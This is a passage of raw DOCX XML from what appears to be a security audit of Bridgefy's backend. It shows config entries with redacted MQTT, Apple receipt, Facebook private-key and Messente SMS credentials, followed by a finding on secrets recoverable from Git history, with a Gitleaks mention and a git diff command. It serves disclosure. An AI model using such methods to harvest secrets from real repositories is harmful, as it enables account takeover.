              <v:shape style="position:absolute;margin-left:141pt;margin-top:.093624pt;width:139.65pt;height:46.85pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:15749120" type="#_x0000_t202" id="docshape47" filled="false" stroked="false">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:tbl>
                      <w:tblPr>
                        <w:tblW w:w="0" w:type="auto"/>
                        <w:jc w:val="left"/>
                        <w:tblCellSpacing w:w="15" w:type="dxa"/>
                        <w:tblInd w:w="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72"/>
                      </w:tblGrid>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="204" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2672" w:type="dxa"/>
                            <w:tcBorders>
                              <w:bottom w:val="nil"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="184" w:lineRule="exact"/>
                              <w:ind w:left="0" w:right="-15"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"MQTTUSERNAME2"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>: </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"br1[...]"</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="197" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2672" w:type="dxa"/>
                            <w:tcBorders>
                              <w:top w:val="nil"/>
                              <w:bottom w:val="nil"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="177" w:lineRule="exact"/>
                              <w:ind w:left="0" w:right="-15"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"MQTTPASSWORD2"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>: </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"br1[...]"</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="197" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2672" w:type="dxa"/>
                            <w:tcBorders>
                              <w:top w:val="nil"/>
                              <w:bottom w:val="nil"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="177" w:lineRule="exact"/>
                              <w:ind w:left="0" w:right="-15"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"MQTTUSERNAME"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>: </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"mik[...]"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="333333"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>,</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="204" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="2672" w:type="dxa"/>
                            <w:tcBorders>
                              <w:top w:val="nil"/>
                            </w:tcBorders>
                            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="184" w:lineRule="exact"/>
                              <w:ind w:left="0" w:right="-15"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"MQTTPASSWORD"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="333333"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>: </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:b/>
                                <w:color w:val="DE4F00"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>"mik[...]"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas"/>
                                <w:color w:val="333333"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="18"/>
                              </w:rPr>
                              <w:t>,</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                    </w:tbl>
                    <w:p>
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="none"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="0" w:right="1394" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="126"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"IOS_VERIFYRECEIPT_URL"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"https://sandbox.itunes.apple.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="552" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1440" w:right="3596" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"IOS_VERIFYRECEIPT_PASSWORD"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"92c[...]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"NUMCONTACTSRESULT"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"10"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1511" w:val="left" w:leader="hyphen"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="1152" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"FBPRIVATEKEY"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"-----BEGIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PRIVATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>KEY-----\nMII[...]\n-----END</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PRIVATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="15751168">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3200400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9353591</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="800100" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="61" name="Graphic 61"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="61" name="Graphic 61"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="800100" cy="1270"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="800100" h="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="800100" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="12699">
                          <a:solidFill>
                            <a:srgbClr val="1154C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51168" from="252pt,736.503296pt" to="315pt,736.503296pt" stroked="true" strokeweight=".999998pt" strokecolor="#1154cc">
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="none"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"MESSENTE_USERNAME"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"a9f[...]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"MESSENTE_PASSWORD"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"d9e[...]"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Multiple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>History</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This issue can be trivially confirmed using automated tools like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>following commands can also be employed to confirm this weakness:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="705" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>repository):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>git diff 729edd~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>729edd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
